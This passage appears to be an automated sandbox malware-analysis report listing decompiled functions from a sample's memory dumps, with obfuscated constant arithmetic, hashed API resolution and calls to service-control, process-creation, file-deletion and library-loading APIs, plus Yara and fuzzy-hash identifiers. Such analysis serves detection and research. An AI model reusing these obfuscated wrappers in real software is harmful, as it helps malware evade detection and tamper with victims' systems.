                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 002E4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 856ded7637982392f38c52d08aad1dc8ae4766ff0a34144981bf64a4fb693a18
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 42F037B081120CFFDF04DFA4D98689EBFBAEB44300F208199E804AB250D3715F519B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E002E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E002D602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(002D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002D591A), ref: 002E9816
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: cf482899311c871345eaa683254743f7d4d0d70c4dadbbfae6173e4374587679
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 7E11B372911188BFDF199F96DC0ACDF7F7AEF89750F108148FA1556120D2728A61EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E002DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E002D602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(002E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002E0668,?,?,?,?), ref: 002DB5FD
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E002E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E002D602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002D87F2,0000CAAE,0000510C,AD82F196), ref: 002E989B
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E002E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002D602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002E7C67
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E002DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002D602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002DF6D8
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E002D602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002DB759
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002D602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002EAAA8
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E002D5FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002D602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002D6025
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E002C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E002C602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002C29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 298c9948ab27f537ea18a68636fbefa599cdee7894828efcba0b3336b1731e20
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 52016D72A00108BFEB14DF95DC4A9DFBFB6EF44310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E002C602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002CC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: eba804cfb1708133eecf51fc6e686f85a13ab16d12e92fbcbd7321041c4e9a05
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: BE1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90966220D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E002C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E002C602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 002C1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 3d178c4779fafcc36863b262186f2e2f7717b1cd17556721c955f9b58a73b1a8
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: E7015BB6D01309BBEF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E002C4859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002C48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 7cc51aa423d44c523c078bcf2de7b93abc3f32d93dc7789c59202c98a93c806a
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 4DF01D70915209FBDB04CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E002D4F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002C602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 002D4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: d33882d87fb76e5ebab56a7135da8880e9a12e1158c87a620e895f0ba6c33620
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: D4F037B081120CFFEB04DFA4D98689EBFBAEB40300F208299E808BB260D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E002D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E002C602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}

                                          APIs
                                          • CreateProcessW.KERNEL32(002C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002C591A), ref: 002D9816
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: dfa07a12a7093778b355002bd6240114c3d2acebedf94738e863881bd533476b
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 2A11B372911149BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E002CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E002C602B(_t32);
                                          				_v8 = 0xfd14;
